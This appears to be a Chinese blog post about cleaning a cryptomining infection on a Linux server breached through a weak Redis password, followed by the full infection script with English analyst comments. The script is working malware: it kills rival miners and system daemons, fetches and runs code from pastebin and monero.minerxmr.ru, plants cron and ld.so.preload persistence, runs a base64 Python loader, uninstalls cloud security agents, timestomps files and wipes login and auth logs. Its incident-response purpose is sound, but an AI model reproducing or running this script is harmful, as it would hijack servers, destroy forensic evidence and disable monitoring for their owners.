• 常见的挖矿程序处理方式


    这个是笔者前些天帮助朋友处理的挖矿程序脚本,本次没有写具体处理方式,只写了处理过程的思路和方法,如果你有好的方法可以一起分享学习,Thank you!

    1.服务器怎么会中挖矿木马程序

     肉鸡 弱口令 webshell xss 软件漏洞bug redis zk mysql 0day等造成服务器被扫描并且提权

    2.首先遇到这种情况,我们杀掉挖矿的程序,它会自己起来

      没清理干净 定时任务 命令修改  开机自启动文件 历史记录 

    3.如何处理?

    首先根据业务判定,造成业务故障,可选用HA方案切走应用服务,对服务器进行下架切断一切网络来源,进行相关处理

    我一般的处理方案是这样:首先通过iptables或者firewalld防火墙手段封死攻击者地址,类似于切断网络来源,接下来我们就可以进行分析和处理挖矿的原因

    处理的方式 可以根据挖矿脚本进行分析 一个一个进行处理 对修改的命令和文件进行恢复和删除  

    对系统和web进行安全测试,对系统漏洞进行修复.

    4.原因分析

    Redis存在弱口令导致的此次故障问题,Redis可以通过config配置方式 修改配置目录将自己的key放在服务器上,以达到服务器提权的目的

      1 #!/bin/bash
      2 SHELL=/bin/sh
      3 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
      4 
#######################################
# Stage 1: clear the field. Kills processes and deletes files belonging to other
# (competing) miner families, then frees the CPU for this family's own miner.
# Every match is a plain substring grep over `ps auxf` / `netstat -anp` or a
# `pkill -f` over the full command line, so any legitimate process whose command
# line happens to contain one of these strings is SIGKILLed as well.
# Globals: none. Arguments: none. Returns: exit status of the last command.
# IR note: the names, paths, pool hostnames, IPs and ports below double as
# detection strings for the families this script competes with.
#######################################
function kills() {
pkill -f sourplum
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
rm -rf /tmp/qW3xT.2 /tmp/ddgs.3013 /tmp/ddgs.3012 /tmp/wnTKYg /tmp/2t3ik
rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*index_bak*
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
rm -rf /tmp/a7b104c270
# Kill by mining-pool hostname/port or drop path appearing in the command line
# (xmrig and its stratum pool URLs are the usual targets).
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrigDaemon" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrigMiner" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/var/tmp/java" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/var/tmp/sustes" | awk '{print $2}'|xargs kill -9
# Kill by process-name fragment. Several entries are the names of real system
# daemons (irqbalance, polkitd, acpid); `pkill -f` matches the whole command line,
# so those services are collateral damage wherever they are running. A few entries
# are duplicated (minerd, sourplum) — harmless, just sloppy.
pkill -f biosetjenkins
pkill -f AnXqV.yam
pkill -f xmrigDaemon
pkill -f xmrigMiner
pkill -f xmrig
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f minerd
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
pkill -f bashx
pkill -f bashg
pkill -f bashe
pkill -f bashf
pkill -f bashh
pkill -f XbashY
pkill -f libapache
pkill -f qW3xT.2
pkill -f /usr/bin/.sshd
pkill -f sustes
# Remove rival drop locations. The kworkerds/config.json/libjdk.so line also removes
# an earlier copy of this family's own artifacts (compare downloadrunxm below),
# presumably so a fresh copy can be installed.
rm -rf /var/tmp/j*
rm -rf /tmp/j*
rm -rf /var/tmp/java
rm -rf /tmp/java
rm -rf /var/tmp/java2
rm -rf /tmp/java2
rm -rf /var/tmp/java*
rm -rf /tmp/java*
rm -rf /tmp/httpd.conf
rm -rf /tmp/conn
rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
rm -rf /tmp/conns
rm -f /tmp/irq.sh
rm -f /tmp/irqbalanc1
rm -f /tmp/irq
rm -rf /tmp/kworkerds /bin/kworkerds /bin/config.json /var/tmp/kworkerds /var/tmp/config.json /usr/local/lib/libjdk.so
rm -rf /tmp/.systemd-private-*
# Kill whatever owns a socket to these remote addresses/ports: column 7 of
# `netstat -anp` is PID/Program, and the second awk splits off the PID. The
# addresses look like rival pool endpoints — not verified on this page.
netstat -anp | grep 69.28.55.86:443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 185.71.65.238 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 140.82.52.87 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :14433 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
# If this family's own miner (kworkerds) is not running, every process at >= 90% CPU
# (column 3 of `ps auxf` is %CPU) is assumed to be a rival miner and killed — with no
# check that it actually is one. This is why busy legitimate workloads die on
# infected hosts.
p=$(ps auxf|grep -v grep|grep kworkerds|wc -l)
if [ ${p} -eq 0 ];then
    ps auxf|grep -v grep | awk '{if($3>=90.0) print $2}'| xargs kill -9
    netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
fi
}

#######################################
# Persistence, part 1: installs /bin/dns (fetched from a pastebin paste — curl first,
# wget as fallback) and schedules it daily at 01:00 as root through /etc/crontab.
# Only acts while /bin/dns is absent, so repeated runs are no-ops once installed.
# Cleanup notes:
#   - `sed -i '$d' /etc/crontab` deletes the LAST line of the existing system crontab
#     before appending, so one pre-existing entry is destroyed on every install.
#   - /bin/dns is whatever the paste contained (a script, given `chmod 755` and a bare
#     `dns` in the cron line) — not a DNS tool; its contents are not on this page.
#   - The function name shadows the `system` word for the rest of the script.
# Globals: none. Arguments: none.
#######################################
function system() {
    if [ ! -f "/bin/dns" ]; then
        curl -fsSL https://pastebin.com/raw/KqzUfgz0 -o /bin/dns && chmod 755 /bin/dns
        if [ ! -f "/bin/dns" ]; then
            wget  https://pastebin.com/raw/KqzUfgz0 -O /bin/dns && chmod 755 /bin/dns
        fi
        if [ ! -f "/etc/crontab" ]; then
            echo -e "0 1 * * * root dns" >> /etc/crontab
        else
            sed -i '$d' /etc/crontab && echo -e "0 1 * * * root dns" >> /etc/crontab
        fi
    fi
}

#######################################
# Persistence, part 2: drops /usr/local/lib/libdns.so (served as a .jpg from
# monero.minerxmr.ru; curl, then wget fallback) and registers it in /etc/ld.so.preload,
# so the dynamic loader maps it into every dynamically linked process started afterwards.
# What the library does is not visible here; a preload .so planted beside a miner is
# typically a user-space rootkit that hides the miner from ps/ls/netstat — treat it as
# such until the binary has been analysed, and use a statically linked toolset (or
# inspect /proc from a clean environment) when triaging.
# `sed -i '$d'` deletes the last existing line of /etc/ld.so.preload before appending.
# `touch -acmr /bin/sh FILE` copies /bin/sh's atime/mtime onto both files (timestomping),
# so mtime-based triage will not surface them; ctime cannot be set this way and is
# still reliable, as is package verification (rpm -V / debsums) for /bin/sh itself.
# The function name shadows the `top` utility for the rest of the script.
#######################################
function top() {
    mkdir -p /usr/local/lib/
    if [ ! -f "/usr/local/lib/libdns.so" ]; then
        curl -fsSL https://monero.minerxmr.ru/1/1535595427x-1404817712.jpg -o /usr/local/lib/libdns.so && chmod 755 /usr/local/lib/libdns.so
        if [ ! -f "/usr/local/lib/libdns.so" ]; then
            wget https://monero.minerxmr.ru/1/1535595427x-1404817712.jpg -O /usr/local/lib/libdns.so && chmod 755 /usr/local/lib/libdns.so
        fi
    fi
    if [ ! -f "/etc/ld.so.preload" ]; then
            echo /usr/local/lib/libdns.so > /etc/ld.so.preload
        else
            sed -i '$d' /etc/ld.so.preload && echo /usr/local/lib/libdns.so >> /etc/ld.so.preload
        fi
    
    touch -acmr /bin/sh /etc/ld.so.preload
    touch -acmr /bin/sh /usr/local/lib/libdns.so
}

#######################################
# Background Python loader. The base64 blob decodes to a short Python 2 program (it
# uses urllib.urlopen) that fetches https://pastebin.com/raw/eRkrSQfE, base64-decodes
# the response and exec()s it inside a bare try/except — a second-stage loader that
# runs entirely in memory and leaves no file on disk. Because `python` is an argument
# to nohup, nohup resolves it through PATH; the shell function of the same name does
# not recurse.
# /tmp/.tmpp is left as a "done" marker, but the main run checks /tmp/.tmpu instead,
# so this stage is re-spawned on every execution (one detached python per run).
#######################################
function python() {
    nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2VSa3JTUWZFJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
    touch /tmp/.tmpp
}

#######################################
# Persistence, part 3: plants the same "fetch a paste and pipe it to sh" job in seven
# places with staggered intervals, so removing one copy is not enough:
#   /etc/cron.d/root (every 10 min), /etc/cron.d/apache (17), /var/spool/cron/root (23),
#   /var/spool/cron/crontabs/root (31), and /etc/cron.{hourly,daily,monthly}/oanacroner
#   (the paste content itself, saved as an executable script; curl, then wget fallback).
# The spool files are written directly rather than via crontab(1). Each echo string
# contains a literal newline (shown here as a line break) followed by "##", a trailing
# cron comment line.
# All seven files then get /bin/sh's atime/mtime via `touch -acmr` (timestomping);
# ctime still tells the truth. This is also the only stage executed on the "update"
# path of the main run.
# Globals: none. Arguments: none.
#######################################
function echocron() {
    echo -e "*/10 * * * * root (curl -fsSL https://pastebin.com/raw/cAfrnxHu||wget -q -O- https://pastebin.com/raw/cAfrnxHu)|sh
    ##" > /etc/cron.d/root
    echo -e "*/17 * * * * root (curl -fsSL https://pastebin.com/raw/cAfrnxHu||wget -q -O- https://pastebin.com/raw/cAfrnxHu)|sh
    ##" > /etc/cron.d/apache
    echo -e "*/23 * * * *    (curl -fsSL https://pastebin.com/raw/cAfrnxHu||wget -q -O- https://pastebin.com/raw/cAfrnxHu)|sh
    ##" > /var/spool/cron/root
    mkdir -p /var/spool/cron/crontabs
    echo -e "*/31 * * * *    (curl -fsSL https://pastebin.com/raw/cAfrnxHu||wget -q -O- https://pastebin.com/raw/cAfrnxHu)|sh
    ##" > /var/spool/cron/crontabs/root
    mkdir -p /etc/cron.hourly
    curl -fsSL https://pastebin.com/raw/cAfrnxHu -o /etc/cron.hourly/oanacroner && chmod 755 /etc/cron.hourly/oanacroner
    if [ ! -f "/etc/cron.hourly/oanacroner" ]; then
        wget https://pastebin.com/raw/cAfrnxHu -O /etc/cron.hourly/oanacroner && chmod 755 /etc/cron.hourly/oanacroner
    fi
    mkdir -p /etc/cron.daily
    curl -fsSL https://pastebin.com/raw/cAfrnxHu -o /etc/cron.daily/oanacroner && chmod 755 /etc/cron.daily/oanacroner
    if [ ! -f "/etc/cron.daily/oanacroner" ]; then
        wget https://pastebin.com/raw/cAfrnxHu -O /etc/cron.daily/oanacroner && chmod 755 /etc/cron.daily/oanacroner
    fi
    mkdir -p /etc/cron.monthly
    curl -fsSL https://pastebin.com/raw/cAfrnxHu -o /etc/cron.monthly/oanacroner && chmod 755 /etc/cron.monthly/oanacroner
    if [ ! -f "/etc/cron.monthly/oanacroner" ]; then
        wget https://pastebin.com/raw/cAfrnxHu -O /etc/cron.monthly/oanacroner && chmod 755 /etc/cron.monthly/oanacroner
    fi
    touch -acmr /bin/sh /var/spool/cron/root
    touch -acmr /bin/sh /var/spool/cron/crontabs/root
    touch -acmr /bin/sh /etc/cron.d/apache
    touch -acmr /bin/sh /etc/cron.d/root
    touch -acmr /bin/sh /etc/cron.hourly/oanacroner
    touch -acmr /bin/sh /etc/cron.daily/oanacroner
    touch -acmr /bin/sh /etc/cron.monthly/oanacroner
}

#######################################
# Closes the door behind itself: rejects inbound TCP 6379 (Redis — the initial-access
# vector named in the write-up above) from everyone except 127.0.0.1, so other
# attackers cannot reuse the same exposed Redis. Both rules are inserted at the head of
# INPUT with -I; the loopback ACCEPT is inserted second and therefore sits above the
# REJECT. `iptables-save` with no redirect only prints the ruleset to stdout — it does
# not persist across reboot. /tmp/.tables marks the stage done for the main run.
# Defender note: an unexplained REJECT on dport 6379 at the top of INPUT is itself a
# useful indicator, and the real fix is Redis auth/bind, not this rule.
#######################################
function tables() {
    iptables -I INPUT -p TCP --dport 6379 -j REJECT
    iptables -I INPUT -s 127.0.0.1 -p tcp --dport 6379 -j ACCEPT
    iptables-save
    touch /tmp/.tables
}

#######################################
# Anti-detection: removes cloud-provider host agents if their processes are present.
# The `[a]liyun` / `[y]unjing` bracket trick keeps the grep process itself out of the
# match.
#   - aliyun / aegis (Alibaba Cloud host agent): downloads the vendor's own uninstall
#     scripts over plain http, runs them from the current directory, kills
#     aliyun-service and deletes its init script and install directories.
#   - qcloud YunJing / stargate / barad (Tencent Cloud agent and monitor): runs the
#     on-disk uninstall scripts.
# The agent's telemetry going silent is therefore an early indicator of this family.
# /tmp/.uninstall marks the stage done for the main run.
#######################################
function uninstall() {
    if ps aux | grep -i '[a]liyun'; then
        wget http://update.aegis.aliyun.com/download/uninstall.sh
        chmod +x uninstall.sh
        ./uninstall.sh
        wget http://update.aegis.aliyun.com/download/quartz_uninstall.sh
        chmod +x quartz_uninstall.sh
        ./quartz_uninstall.sh
        rm -f uninstall.sh     quartz_uninstall.sh
        pkill aliyun-service
        rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
        rm -rf /usr/local/aegis*;
    elif ps aux | grep -i '[y]unjing'; then
        /usr/local/qcloud/stargate/admin/uninstall.sh
        /usr/local/qcloud/YunJing/uninst.sh
        /usr/local/qcloud/monitor/barad/admin/uninstall.sh
    fi
    touch /tmp/.uninstall
}

#######################################
# Payload stage, first attempt. If no socket to 167.99.8.x is open (substring match on
# `netstat -anp`; the unescaped `.` in the pattern matches any character, which the
# author evidently accepts), fetch the miner to /tmp/kworkerds — served as a .jpg from
# monero.minerxmr.ru, curl with a 120 s connect timeout, wget as fallback — mark it
# executable and start it detached with nohup. If the file is already there it is
# simply started. The name imitates the kernel's kworker threads in `ps` output.
# 167.99.8.x is treated by the rest of the script as "the miner is connected", so it is
# presumably the pool/C2 address — confirm against the binary or network captures.
# The local variable is named `ps`, shadowing nothing (it is a plain variable, not the
# command) but easy to misread.
#######################################
function downloadrun() {
    ps=$(netstat -anp | grep 167.99.8 | wc -l)
    if [ ${ps} -eq 0 ];then
        if [ ! -f "/tmp/kworkerds" ]; then
            curl -fsSL --connect-timeout 120 https://monero.minerxmr.ru/1/1538099276x-1404792622.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
            if [ ! -f "/tmp/kworkerds" ]; then
                wget https://monero.minerxmr.ru/1/1538099276x-1404792622.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
            fi
                nohup /tmp/kworkerds >/dev/null 2>&1 &
        else
            nohup /tmp/kworkerds >/dev/null 2>&1 &
        fi
    fi
}

#######################################
# Payload stage, second attempt (the main run calls this when, 10 s after downloadrun,
# there is still no socket to 167.99.8.x). Re-creates a world-writable /var/tmp, drops
# the miner configuration to /var/tmp/config.json (chmod +x although it is data) and an
# architecture-specific binary to /var/tmp/kworkerds, then starts it with nohup.
# `uname -i` selects the x86_64 or i386 build; anything else falls back to the x86_64 URL.
# Bug visible in all three wget fallbacks: they write to /bin/kworkerds but chmod
# /var/tmp/kworkerds, so on hosts where curl failed the binary may sit in /bin instead
# — check both locations during cleanup (kills() already lists /bin/kworkerds and
# /bin/config.json among its removals, so the author knew).
# The three branches are identical apart from the download URL.
#######################################
function downloadrunxm() {
    mkdir -p /var/tmp
    chmod 1777 /var/tmp
    pm=$(netstat -anp | grep 167.99.8 | wc -l)
    if [ ${pm} -eq 0 ];then
        rm -rf /var/tmp/config.json*
        curl -fsSL --connect-timeout 120 https://monero.minerxmr.ru/007/008/1534496022x-1404764583.jpg -o /var/tmp/config.json && chmod +x /var/tmp/config.json
        if [ ! -f "/var/tmp/config.json" ]; then
            wget https://monero.minerxmr.ru/007/008/1534496022x-1404764583.jpg -O /var/tmp/config.json && chmod +x /var/tmp/config.json
        fi
        ARCH=$(uname -i)
        if [ "$ARCH" == "x86_64" ]; then
            rm -rf /var/tmp/kworkerds*
            curl -fsSL --connect-timeout 120 https://monero.minerxmr.ru/1/1537410304x-1404764882.jpg -o /var/tmp/kworkerds && chmod +x /var/tmp/kworkerds
            if [ ! -f "/var/tmp/kworkerds" ]; then
                wget https://monero.minerxmr.ru/1/1537410304x-1404764882.jpg -O /bin/kworkerds && chmod +x /var/tmp/kworkerds
            fi
            nohup /var/tmp/kworkerds >/dev/null 2>&1 &
        elif [ "$ARCH" == "i386" ]; then
            rm -rf /var/tmp/kworkerds*
            curl -fsSL --connect-timeout 120 https://monero.minerxmr.ru/1/1537410750x-1566657908.jpg -o /var/tmp/kworkerds && chmod +x /var/tmp/kworkerds
            if [ ! -f "/var/tmp/kworkerds" ]; then
                wget https://monero.minerxmr.ru/1/1537410750x-1566657908.jpg -O /bin/kworkerds && chmod +x /var/tmp/kworkerds
            fi
            nohup /var/tmp/kworkerds >/dev/null 2>&1 &
        else
            rm -rf /var/tmp/kworkerds*
            curl -fsSL --connect-timeout 120 https://monero.minerxmr.ru/1/1537410304x-1404764882.jpg -o /var/tmp/kworkerds && chmod +x /var/tmp/kworkerds
            if [ ! -f "/var/tmp/kworkerds" ]; then
                wget https://monero.minerxmr.ru/1/1537410304x-1404764882.jpg -O /bin/kworkerds && chmod +x /var/tmp/kworkerds
            fi
            nohup /var/tmp/kworkerds >/dev/null 2>&1 &
        fi
    fi
}

# ---- main run ----
# Make sure a world-writable /tmp exists: the stage markers and the first payload live there.
mkdir -p /tmp
chmod 1777 /tmp
# Remote mode switch fetched from pastebin. If the paste body is exactly "update", only
# the cron entries are refreshed; anything else — including a failed fetch, which with
# `curl -f` yields an empty string — runs the full install below. The `x` suffixes keep
# the test well-formed when the value is empty.
update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/SGM25Vs3 )
if [ ${update}x = "update"x ];then
    echocron
else
    # One-shot stages gated by marker files in /tmp. The python stage writes /tmp/.tmpp
    # but this guard checks /tmp/.tmpu, so that stage actually runs on every execution.
    if [ ! -f "/tmp/.uninstall" ]; then
        uninstall
    fi
    if [ ! -f "/tmp/.tables" ]; then
        tables
    fi
    if [ ! -f "/tmp/.tmpu" ]; then
        rm -rf /tmp/.tmpp
        python
    fi
    # Order: evict rivals, start the miner, then layer persistence (cron, /bin/dns,
    # ld.so.preload library).
    kills
    downloadrun
    echocron
    system
    top
    # Give the miner 10 s to connect; if still no socket to 167.99.8.x, fall back to the
    # /var/tmp payload and arch-specific builds.
    sleep 10
    port=$(netstat -anp | grep 167.99.8 | wc -l)
    if [ ${port} -eq 0 ];then
        downloadrunxm
    fi
    # Anti-forensics. `echo 0>FILE` is parsed as `echo` with fd 0 (stdin) redirected to
    # FILE opened for writing, i.e. FILE is truncated to zero length — the "0" is never
    # written (a bare newline goes to stdout). Root's mailbox, the login history (wtmp),
    # the auth log and the cron log are all emptied, so zero-byte copies of these files
    # are a strong indicator; only remotely shipped logs survive this.
    echo 0>/var/spool/mail/root
    echo 0>/var/log/wtmp
    echo 0>/var/log/secure
    echo 0>/var/log/cron
    # Final callback to a short-link style URL, response discarded — presumably an
    # infection counter for the operator (not verifiable from the script).
    curl -sk https://2no.co/11Grb
fi
#
  • 原文地址:https://www.cnblogs.com/egrep/p/9721538.html